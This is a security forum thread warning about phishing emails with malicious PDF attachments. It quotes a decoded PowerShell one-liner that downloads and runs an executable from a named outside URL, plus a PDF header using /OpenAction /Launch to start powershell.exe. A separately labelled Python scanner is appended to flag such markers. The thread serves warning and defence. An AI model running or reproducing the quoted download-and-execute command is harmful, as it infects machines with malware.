Community Discussions and Support
Malicious content in .pdf attachments

[quote user="irelam"]In Adobe Reader you can disable Javascript via the menu Preferences/Javascript and uncheck the Enable Acrobat Javascript. I am not sure if this would completely protect you but it is worth a try. Seems there is also a way of involving Group Policy controlling Reader execution.
[/quote]

You also need to disable opening of non-PDF attachments using external applications.  That setting is on the "Trust Manager" page of Preferences.  I also always disable "Allow multimedia operations" on the Preferences/Multimedia Trust (legacy) page -- I don't want a malware 0-day Flash attachment to start playing in Reader.

Unfortunately all these options are per-user, not per-computer, so you would need to do it for every login on your computer.  Might be able to configure them using Group Policy in a domain setting, but I don't know how.  I can only find the Javascript option in the registry, the MMTrust and TrustMgr don't have separate keys under Adobe Reader.


All,

Just a heads up to let you know that I have recently received two messages here at the office that carried a .pdf attachment containing a base64 encoded script.  The decoded content of one of them was:

PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('http://ncduganda.org/.css/mike.exe', $env:APPDATA\mike.exe);Start-Process ($env:APPDATA\mike.exe)

I had heard that .pdf files could carry malicious content but this is the first one I have actually seen (assumption:  mike.exe is malicious). 

These messages looked very genuine with subjects like "New order inquiry" and content like "Please find the attached PO copy and New order...".   

This is social engineering at a very high level.  Be careful out there!


Brian

What did you use to decode the base64 script? In particular, was it done by Adobe code? Did you know that a PDF file could contain an attachment, and following on from that, is there a marker that declares this kind of content? For example we can detect an encrypted zip file in Virscan.

Martin 


The red flag was content visible in the preview pane.  Here are the lines up to the encoded part:

%PDF-1.1
1 0 obj
<<
/OpenAction <<
/S /Launch/Win
<<
/F (C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe) /P
(powershell.exe -EncodedCommand

I use Tracker-Software products for my pdf viewing/editing so I posted on their support forum inquiry into built-in protection.  Someone there decoded it.

See: www.tracker-software.com/forum3/viewtopic.php?f=62&t=25640.
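As an added defensive example (not code from this thread, from Adobe or from Tracker-Software), a small Python checker that answers Martin's question about markers: it flags the PDF name objects that declare auto-run, launch, JavaScript and attachment content, and it undoes the #xx hex-escaped spelling of names that hides those keywords from a naive string search. The sample PDF bytes are constructed here after the /OpenAction /Launch structure Brian posted, with a placeholder in place of the encoded command.

```python
import re

# PDF name objects worth flagging; /Launch is the mechanism in the posted sample.
RISKY_NAMES = {
    "/OpenAction": "action runs automatically when the document is opened",
    "/AA": "additional (event-triggered) actions",
    "/Launch": "launches an external program",
    "/JavaScript": "JavaScript action",
    "/JS": "inline JavaScript code",
    "/EmbeddedFile": "file attachment stored inside the PDF",
}

_HEX_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")

def normalize_names(data: bytes) -> bytes:
    """Undo #xx escapes in name objects (e.g. /Laun#63h -> /Launch)."""
    return _HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)

def scan_pdf(data: bytes) -> dict:
    """Return {name: occurrences} for every risky name present."""
    norm = normalize_names(data)
    hits = {}
    for name in RISKY_NAMES:
        # Require a delimiter after the name so /JS does not match /JSPrefs.
        pattern = re.escape(name.encode()) + rb"(?![A-Za-z0-9_])"
        count = len(re.findall(pattern, norm))
        if count:
            hits[name] = count
    return hits

def launch_targets(data: bytes) -> list:
    """Return (/F program, /P parameters) pairs of /Launch actions.
    Handles plain (...) strings only, not strings with escaped parentheses."""
    norm = normalize_names(data)
    pat = rb"/Launch.*?/F\s*\((.*?)\)(?:.*?/P\s*\((.*?)\))?"
    return [(m.group(1).decode("latin-1"), (m.group(2) or b"").decode("latin-1"))
            for m in re.finditer(pat, norm, re.S)]

# Constructed sample modelled on the posted header; the command is a placeholder.
SAMPLE_PDF = b"""%PDF-1.1
1 0 obj
<<
/Type /Catalog
/OpenAction <<
/S /Launch
/Win <<
/F (C:\\\\WINDOWS\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe)
/P (powershell.exe -EncodedCommand PLACEHOLDER_BASE64)
>>
>>
>>
endobj
"""
```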



In Adobe Reader you can disable Javascript via the menu Preferences/Javascript and uncheck the Enable Acrobat Javascript. I am not sure if this would completely protect you but it is worth a try. Seems there is also a way of involving Group Policy controlling Reader execution.
